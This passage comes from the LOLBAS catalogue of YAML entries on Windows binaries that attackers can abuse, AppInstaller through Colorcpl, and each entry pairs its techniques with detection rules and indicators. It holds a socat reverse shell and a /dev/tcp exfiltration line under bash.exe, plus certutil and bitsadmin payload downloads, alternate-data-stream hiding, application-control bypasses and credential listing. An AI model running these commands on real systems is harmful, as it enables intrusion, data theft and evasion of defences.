https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml Resources: - Link: https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html Acknowledgement: - Person: Michael McKinley Handle: '@MckinleyMike' - Person: Tony Latteri Handle: '@TheLatteri' ================================================ FILE: yml/OSBinaries/AppInstaller.yml ================================================ --- Name: AppInstaller.exe Description: Tool used for installation of AppX/MSIX applications on Windows 10 Author: 'Wade Hickey' Created: 2020-12-02 Commands: - Command: start ms-appinstaller://?source={REMOTEURL:.exe} Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml Resources: - Link: https://twitter.com/notwhickey/status/1333900137232523264 Acknowledgement: - Person: Wade Hickey Handle: '@notwhickey' ================================================ FILE: yml/OSBinaries/Aspnet_Compiler.yml ================================================ --- Name: Aspnet_Compiler.exe Description: ASP.NET Compilation Tool Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u Description: Execute C# code with the Build Provider and proper folder structure in place. Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Code_Sample: - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml Resources: - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 Acknowledgement: - Person: cpl Handle: '@cpl3h' ================================================ FILE: yml/OSBinaries/At.yml ================================================ --- Name: At.exe Description: Schedule periodic tasks Author: 'Freddie Barr-Smith' Created: 2019-09-20 Commands: - Command: C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD} Description: Create a recurring task to execute every day at a specific time. Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive Category: Execute Privileges: Local Admin MitreID: T1053.002 OperatingSystem: Windows 7 or older Tags: - Execute: CMD Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/builtin/security/win_security_atsvc_task.yml - IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job) - IOC: C:\Windows\Tasks\At1.job - IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1. Resources: - Link: https://freddiebarrsmith.com/at.txt - Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems Acknowledgement: - Person: 'Freddie Barr-Smith' Handle: - Person: 'Riccardo Spolaor' Handle: - Person: 'Mariano Graziano' Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ================================================ FILE: yml/OSBinaries/Atbroker.yml ================================================ --- Name: Atbroker.exe Description: Helper binary for Assistive Technology (AT) Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: ATBroker.exe /start malware Description: Start a registered Assistive Technology (AT). Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware Resources: - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ Acknowledgement: - Person: Adam Handle: '@hexacorn' ================================================ FILE: yml/OSBinaries/Bash.yml ================================================ --- Name: Bash.exe Description: File used by Windows subsystem for Linux Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: bash.exe -c "{CMD}" Description: Executes executable from bash.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10 Tags: - Execute: CMD - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverse shell Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10 Tags: - Execute: CMD - Command: bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10 Tags: - Execute: CMD - Command: bash.exe -c "{CMD}" Description: Executes executable from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. Category: AWL Bypass Privileges: User MitreID: T1202 OperatingSystem: Windows 10 Tags: - Execute: CMD - Command: bash.exe Description: When executed, `bash.exe` queries the registry value of `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Lxss\MSI\InstallLocation`, which contains a folder path (`c:\program files\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder. Usecase: Execute a payload as a child process of `bash.exe` while masquerading as WSL. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows Server 2019, Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml - IOC: Child process from bash.exe Resources: - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Link: https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/ Acknowledgement: - Person: Alex Ionescu Handle: '@aionescu' - Person: Asif Matadar Handle: '@d1r4c' - Person: Liran Ravich, CardinalOps ================================================ FILE: yml/OSBinaries/Bitsadmin.yml ================================================ --- Name: Bitsadmin.exe Description: Used for managing background intelligent transfer Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique. Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset Description: Command for copying cmd.exe to another folder Usecase: Copy file Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. Usecase: Execute binary file specified. Can be used as a defensive evasion. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\bitsadmin.exe - Path: C:\Windows\SysWOW64\bitsadmin.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml - IOC: Child process from bitsadmin.exe - IOC: bitsadmin creates new files - IOC: bitsadmin adds data to alternate data stream Resources: - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://www.soc-labs.top/en/detections/100 Acknowledgement: - Person: Rob Fuller Handle: '@mubix' - Person: Chris Gates Handle: '@carnal0wnage' - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/Certoc.yml ================================================ --- Name: CertOC.exe Description: Used for installing certificates Author: 'Ensar Samil' Created: 2021-10-07 Commands: - Command: certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll} Description: Loads the target DLL file Usecase: Execute code within DLL file Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Server 2022 Tags: - Execute: DLL - Command: certoc.exe -GetCACAPS {REMOTEURL:.ps1} Description: Downloads text formatted files Usecase: Download scripts, webshells etc. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Server 2022 Full_Path: - Path: c:\windows\system32\certoc.exe - Path: c:\windows\syswow64\certoc.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml - IOC: Process creation with given parameter - IOC: Unsigned DLL load via certoc.exe - IOC: Network connection via certoc.exe Resources: - Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20 Acknowledgement: - Person: Ensar Samil Handle: '@sblmsrsn' ================================================ FILE: yml/OSBinaries/Certreq.yml ================================================ --- Name: CertReq.exe Description: Used for requesting and managing certificates Author: David Middlehurst Created: 2020-07-07 Commands: - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt} Description: Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument). Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - Command: CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} Description: Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal. Usecase: Upload Category: Upload Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\certreq.exe - Path: C:\Windows\SysWOW64\certreq.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml - IOC: certreq creates new files - IOC: certreq makes POST requests Resources: - Link: https://dtm.uk/certreq Acknowledgement: - Person: David Middlehurst Handle: '@dtmsecurity' ================================================ FILE: yml/OSBinaries/Certutil.yml ================================================ --- Name: Certutil.exe Description: Windows binary used for handling certificates Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe} Description: Download and save an executable to disk in the current folder. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe} Description: Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\` when not. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt Description: Download and save a .ps1 file to an Alternate Data Stream (ADS). Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -URL {REMOTEURL:.exe} Description: Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\`. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Application: GUI - Command: certutil -encode {PATH} {PATH:.base64} Description: Command to encode a file using Base64 Usecase: Encode files to evade defensive measures Category: Encode Privileges: User MitreID: T1027.013 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil -decode {PATH:.base64} {PATH} Description: Command to decode a Base64 encoded file. Usecase: Decode files to evade defensive measures Category: Decode Privileges: User MitreID: T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil -decodehex {PATH:.hex} {PATH} Description: Command to decode a hexadecimal-encoded file. Usecase: Decode files to evade defensive measures Category: Decode Privileges: User MitreID: T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml - Elastic: https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml - IOC: Certutil.exe creating new files on disk - IOC: Useragent Microsoft-CryptoAPI/10.0 - IOC: Useragent CertUtil URL Agent Resources: - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 - Link: https://twitter.com/mattifestation/status/620107926288515072 - Link: https://twitter.com/egre55/status/1087685529016193025 - Link: https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/ Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' - Person: Moriarty Handle: '@Moriarty_Meng' - Person: egre55 Handle: '@egre55' - Person: Lior Adar - Person: Adam Handle: '@hexacorn' - Person: SomeTestLeper Handle: '@SomeTestLeper' ================================================ FILE: yml/OSBinaries/Change.yml ================================================ --- Name: Change.exe Description: Remote Desktop Services MultiUser Change Utility Author: 'Idan Lerman' Created: 2025-07-31 Commands: - Command: change.exe user Description: Once executed, `change.exe` will execute `chgusr.exe` in the same folder. Thus, if `change.exe` is copied to a folder and an arbitrary executable is renamed to `chgusr.exe`, `change.exe` will spawn it. Instead of `user`, it is also possible to use `port` or `logon` as command-line option. Usecase: Execute an arbitrary executable via trusted system executable. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Requires: Rename Full_Path: - Path: c:\windows\system32\change.exe - Path: c:\windows\syswow64\change.exe Detection: - IOC: change.exe being executed and executes a child process outside of its normal path of c:\windows\system32\ or c:\windows\syswow64\ Acknowledgement: - Person: Idan Lerman Handle: '@IdanLerman' ================================================ FILE: yml/OSBinaries/Cipher.yml ================================================ --- Name: Cipher.exe Description: File Encryption Utility Author: Adetutu Ogunsowo Created: 2024-11-22 Commands: - Command: cipher /w:{PATH_ABSOLUTE:folder} Description: Zero out a file Usecase: Can be used to forensically erase a file. Category: Tamper Privileges: User MitreID: T1485 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: cipher.exe /e {PATH_ABSOLUTE} Description: Encrypt a file Usecase: Can be used to impair defences by e.g. encrypting a critical EDR solution file. Category: Tamper Privileges: Admin MitreID: T1562 OperatingSystem: Windows 10 Full_Path: - Path: c:\windows\system32\cipher.exe - Path: c:\windows\syswow64\cipher.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml - IOC: cipher.exe process with /w on the command line Resources: - Link: https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/ Acknowledgement: - Person: Ade Ogunsowo Handle: "@i_am_tutu" - Person: Alexander Sennhauser Handle: '@conitrade' ================================================ FILE: yml/OSBinaries/Cmd.yml ================================================ --- Name: Cmd.exe Description: The command-line interpreter in Windows Author: Ye Yint Min Thu Htut Created: 2019-06-26 Commands: - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: cmd.exe - < {PATH}:payload.bat Description: Execute payload.bat stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1059.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: type {PATH_SMB} > {PATH_ABSOLUTE} Description: Downloads a specified file from a WebDAV server to the target file. Usecase: Download/copy a file from a WebDAV server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: type {PATH_ABSOLUTE} > {PATH_SMB} Description: Uploads a specified file to a WebDAV server. Usecase: Upload a file to a WebDAV server Category: Upload Privileges: User MitreID: T1048.003 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\cmd.exe - Path: C:\Windows\SysWOW64\cmd.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - IOC: cmd.exe executing files from alternate data streams. - IOC: cmd.exe creating/modifying file contents in an alternate data stream. Resources: - Link: https://twitter.com/yeyint_mth/status/1143824979139579904 - Link: https://twitter.com/Mr_0rng/status/1601408154780446721 - Link: https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22 - Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type Acknowledgement: - Person: r0lan Handle: '@yeyint_mth' - Person: Mr.0range Handle: '@mr_0rng' ================================================ FILE: yml/OSBinaries/Cmdkey.yml ================================================ --- Name: Cmdkey.exe Description: creates, lists, and deletes stored user names and passwords or credentials. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: cmdkey /list Description: List cached credentials Usecase: Get credential information from host Category: Credentials Privileges: User MitreID: T1078 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\cmdkey.exe - Path: C:\Windows\SysWOW64\cmdkey.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml Resources: - Link: https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey ================================================ FILE: yml/OSBinaries/Cmdl32.yml ================================================ --- Name: cmdl32.exe Description: Microsoft Connection Manager Auto-Download Author: Elliot Killick Created: 2021-08-26 Commands: - Command: cmdl32 /vpn /lan %cd%\config Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\cmdl32.exe - Path: C:\Windows\SysWOW64\cmdl32.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml - IOC: Reports of downloading from suspicious URLs in %TMP%\config.log - IOC: Useragent Microsoft(R) Connection Manager Vpn File Update Resources: - Link: https://github.com/LOLBAS-Project/LOLBAS/pull/151 - Link: https://twitter.com/ElliotKillick/status/1455897435063074824 - Link: https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/ Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ================================================ FILE: yml/OSBinaries/Cmstp.yml ================================================ --- Name: Cmstp.exe Description: Installs or removes a Connection Manager service profile. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: cmstp.exe /ni /s {PATH_ABSOLUTE:.inf} Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. Category: Execute Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - Command: cmstp.exe /ni /s {REMOTEURL:.inf} Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Category: AWL Bypass Privileges: User MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: INF - Execute: Remote - Command: cmstp.exe /nf Description: cmstp.exe reads the `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe\CmstpExtensionDll` registry value and passes its data directly to `LoadLibrary`. By modifying this registry key and setting it to an attack-controlled DLL, this will sideload the DLL via `cmstp.exe`. Usecase: Proxy execution of a malicious DLL via registry modification. Category: Execute Privileges: Administrator MitreID: T1218.003 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - Requires: Registry Change Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - IOC: Execution of cmstp.exe without a VPN use case is suspicious - IOC: DotNet CLR libraries loaded into cmstp.exe - IOC: DotNet CLR Usage Log - cmstp.exe.log - IOC: Registry modification to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe\CmstpExtensionDll Resources: - Link: https://twitter.com/NickTyrer/status/958450014111633408 - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 - Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e - Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ - Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp - Link: https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' - Person: Nick Tyrer Handle: '@NickTyrer' - Person: Naor Evgi Handle: '@ghosts621' ================================================ FILE: yml/OSBinaries/Colorcpl.yml ================================================ --- Name: Colorcpl.exe Description: Binary that handles color management Author: Arjan Onwezen Created: 2023-06-26 Commands: - Command: colorcpl {PATH} Description: Copies the referenced file to C:\Windows\System32\spool\drivers\color\. Usecase: Copies file(s) to a subfolder of a generally trusted folder (c:\Windows\System32), which can be used to hide files or make them blend into the environment. Category: Copy Privileges: User MitreID: T1036.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\colorcpl.exe - Path: C:\Windows\SysWOW64\colorcpl.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml - IOC: colorcpl.exe writing files Resources: - Link: https://twitter.com/eral4m/status/1480468728324231172 Acknowledgement: - Person: eral4m 